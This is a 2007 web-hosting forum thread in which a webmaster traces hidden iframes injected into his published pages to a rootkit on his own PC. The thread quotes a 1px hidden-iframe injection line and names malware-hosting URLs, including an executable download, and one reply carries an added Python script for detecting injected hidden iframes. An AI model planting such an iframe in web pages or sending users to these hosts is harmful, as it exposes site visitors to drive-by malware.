Old 05-16-2007, 05:02 PM Hacked or What?!
Novice Talker

Posts: 7
Name: Barney
Trades: 0


Hi guys!

I have a problem which I'll explain below. Please excuse if this is posted in the wrong section...

Since yesterday whenever I publish a client's website, it gets infected with a virus while being on the server.

For instance:

I upload the homepage (index.htm) to a domain. The file seems clean with no trace of the virus. About 20 minutes later I visit that site again through my browser and voila, it now tries to download a virus file to my PC!

I viewed the source and I noticed how it installed a code by itself, similar to this:
<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Sometimes there is one line, sometimes more. It gets installed by itself just under the body bg tag and then sometimes also way at the bottom of the file.

This is not a virus resident on the web server, as I've posted sites to various web servers hosted by different ISPs in different countries. This only happens to sites that I publish.

I thought it's coming from my PC but then why is it clean when I upload it, and after a while it gets infected with this script?

I downloaded the infected file via FTP and opened in Frontpage 2000, then I see nothing. In Notepad I also see nothing.

But when I open the html file in Frontpage 2002, I see in the code nothing, but in the WYSIWYG editor four small 1px x 1px blocks (iFrames) linking to http://kleman.info.

This wants to download http://81.95.146.150/mad.exe (please don't click).

Anyways, in the end I found the domain kleman.info to be hosted on a name server called deduct.biz, again hosted by TimeNet ISP in Malaysia.

I've contacted them and will now see what happens.

Meanwhile, every index.htm homepage I publish to a client's domain gets infected after a while, while being resident on the server. (Other accounts don't get infected on the server and it seems like it's only the index page.)

Does anyone have ANY idea on how to solve this??

Please guys, your help would be much appreciated.

Seems like these guys had the same problem:
http://forums.spikedhumor.com/showthread.php?t=4559

Although no help to me though.

Thanks guys,
Barney ZAR
Old 05-16-2007, 05:11 PM Re: Hacked or What?!
tripy
Do not try this at home!

Posts: 3,621
Name: Thierry
Location: I'm the uber Spaminator !
Trades: 0
The most probable thing is that the server has been compromised, and the web server now magically adds a link to that virus on every page that is requested through the server.

Alert your hosting provider; he has to run forensics and clean up his server.
__________________
Only a biker knows why a dog sticks his head out the window.
Old 05-16-2007, 05:19 PM Re: Hacked or What?!
Novice Talker

Posts: 7
Name: Barney
Trades: 0
Hey there,

I also thought it was the server, but to test this, I have uploaded the same file to other servers in other countries with other service providers and it does the same?


Thanks
Barney ZAR
Old 05-16-2007, 06:02 PM Re: Hacked or What?!
tripy
Do not try this at home!

Posts: 3,621
Name: Thierry
Location: I'm the uber Spaminator !
Trades: 0
Then it's either something on your PC, or in the HTML of the page that calls that.
There is simply no other way (that I know of, at least...)
Old 05-16-2007, 06:08 PM Re: Hacked or What?!
chrishirst
Missing! presumed drunk.

Posts: 42,382
Name: Chris Hirst
Location: Blackpool. UK
Trades: 0
Your computer is infected with spyware.
__________________

A foolish consistency is the hobgoblin of little minds
Thought for today:- Is SEO the only industry where all the cowboys are Indians?
Old 05-17-2007, 01:31 AM Re: Hacked or What?!
Novice Talker

Posts: 7
Name: Barney
Trades: 0
Hi guys

Yip it seems like you are right, this looks like spyware!! =(

I scanned my PC and it seems like it removed some stuff, but are there any other tips you have?

I did change my one account's password and in my FTP program (Win Commander) I took out the username of another so that you have to type it manually.

I don't know whether I should change all passwords or if I should just remove the stored info in my FTP program?

This is my first encounter with something like this.
Old 05-17-2007, 03:20 AM Re: Hacked or What?!
chrishirst
Missing! presumed drunk.

Posts: 42,382
Name: Chris Hirst
Location: Blackpool. UK
Trades: 0
I doubt that it was or is connecting via FTP; spyware isn't usually written with webmasters in mind.
A check on your source code from the design tool and in your browser will confirm where the rogue code is coming from.
If you can't see it in the source from the server, but you can in the rendered source from your browser, then it is being injected as the page is rendering/downloading. This type of scumware intercepts the code stream at HTTP client level and inserts its own section of code which then is rendered or activated by the browser.
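The comparison suggested in the post above (the source as published against the source as it is later served), as an added example that is not part of the original thread: it lists iframes that appear only in the served copy and flags the 1px or CSS-hidden ones like the line quoted in the first post. The function names, the sample page and the `injected.example` URL are constructed for illustration; fetching the served copy is left to the reader.

```python
from html.parser import HTMLParser
import re

class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes and line number."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append((dict(attrs), self.getpos()[0]))

def find_iframes(html):
    parser = IframeCollector()
    parser.feed(html)
    parser.close()
    return parser.iframes

def is_hidden(attrs):
    """True for a frame sized 0-1px in both dimensions or hidden by inline CSS."""
    def tiny(value):
        m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "")
        return bool(m) and int(m.group(1)) <= 1
    style = (attrs.get("style") or "").lower().replace(" ", "")
    return ((tiny(attrs.get("width")) and tiny(attrs.get("height")))
            or "visibility:hidden" in style or "display:none" in style)

def injected_iframes(published, served):
    """Iframes in the served copy whose src does not occur in the published copy."""
    known = {attrs.get("src") for attrs, _ in find_iframes(published)}
    return [{"src": attrs.get("src"), "line": line, "hidden": is_hidden(attrs)}
            for attrs, line in find_iframes(served) if attrs.get("src") not in known]

# Constructed sample: the page as published, and the same page with one frame added
PUBLISHED = """<html>
<body bgcolor="#ffffff">
<h1>Welcome</h1>
<iframe src="map.htm" width="400" height="300"></iframe>
</body>
</html>
"""
HIDDEN = ("<iframe src='http://injected.example/st/index.php' width='1' "
          "height='1' style='visibility: hidden;'></iframe>")
SERVED = PUBLISHED.replace('<body bgcolor="#ffffff">\n',
                           '<body bgcolor="#ffffff">\n' + HIDDEN + "\n")

if __name__ == "__main__":
    for hit in injected_iframes(PUBLISHED, SERVED):
        print(hit)
```

Run it against the copy kept on the publishing machine and a copy retrieved from the server on a different, clean machine, so that neither side of the comparison passes through the suspect PC.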
 
Old 05-17-2007, 03:31 AM Re: Hacked or What?!
Novice Talker

Posts: 7
Name: Barney
Trades: 0
Ok this is what I found in the end:

I downloaded the infected index.htm file from the web server via FTP, opened in Notepad and you see nothing.

When opened in Frontpage, the code shows nothing but the WYSIWYG editor in Frontpage 2002 shows four 1px x 1px blocks, which are iFrames NOT visible in the HTML code. These are linked to open the following URL:

http://kleman.info

In the end it seems to want to download a mad.exe file.

Somehow these iFrame scripts are NOT visible in the code. I don't know how they manage to get this right.

To further update on the situation...

http://kleman.info is hosted on http://www.deduct.biz - this is not a virus site it seems, but rather a site to fool anyone to think that this is their ISP.

The actual ISP is located in Malaysia. I've contacted them and now await their response.

I hope this helps!

Barney ZAR
Old 05-17-2007, 03:34 AM Re: Hacked or What?!
Novice Talker

Posts: 7
Name: Barney
Trades: 0
Oh and btw... while the index.htm homepage is infected, everyone visiting that site could also see it.

(After the anti-virus on my PC found a trojan I removed it and re-published all index.htm files to infected domains, it now seems clean)
Old 05-17-2007, 04:16 AM Re: Hacked or What?!
chrishirst
Missing! presumed drunk.

Posts: 42,382
Name: Chris Hirst
Location: Blackpool. UK
Trades: 0
Quote:
Somehow these iFrame scripts are NOT visible in the code. I don't know how they manage to get this right
Read post #7.


It is NOT the server, simply your PC that could see the issue.
Old 05-17-2007, 04:20 AM Re: Hacked or What?!
Novice Talker

Posts: 7
Name: Barney
Trades: 0
Ok but the visitors to those sites could also see it ...

i.e. as soon as my PC infected www.domainX.com then any visitor to that domain also complained that the site opened slowly and wanted to download some trojan virus.

I went to an internet cafe and to some client machines... I checked the source code via the browser and saw the iFrame script on their PCs.


Barney ZAR
Old 05-17-2007, 11:48 AM Re: Hacked or What?!
HighVoltage123
Ultra Talker

Posts: 262
Trades: 0
What about the hosting company - can the problem be there?
Old 05-17-2007, 12:27 PM Re: Hacked or What?!
Novice Talker

Posts: 7
Name: Barney
Trades: 0
Problem solved - was a rootkit on my PC.

Thanks guys =)


Barney ZAR
Old 05-19-2007, 10:27 PM Re: Hacked or What?!
Kiz
Extreme Talker

Posts: 212
Location: Ocala, FL
Trades: 1
Kaspersky = you won't have problems..
Website coming soon.
Urban & Web 2.0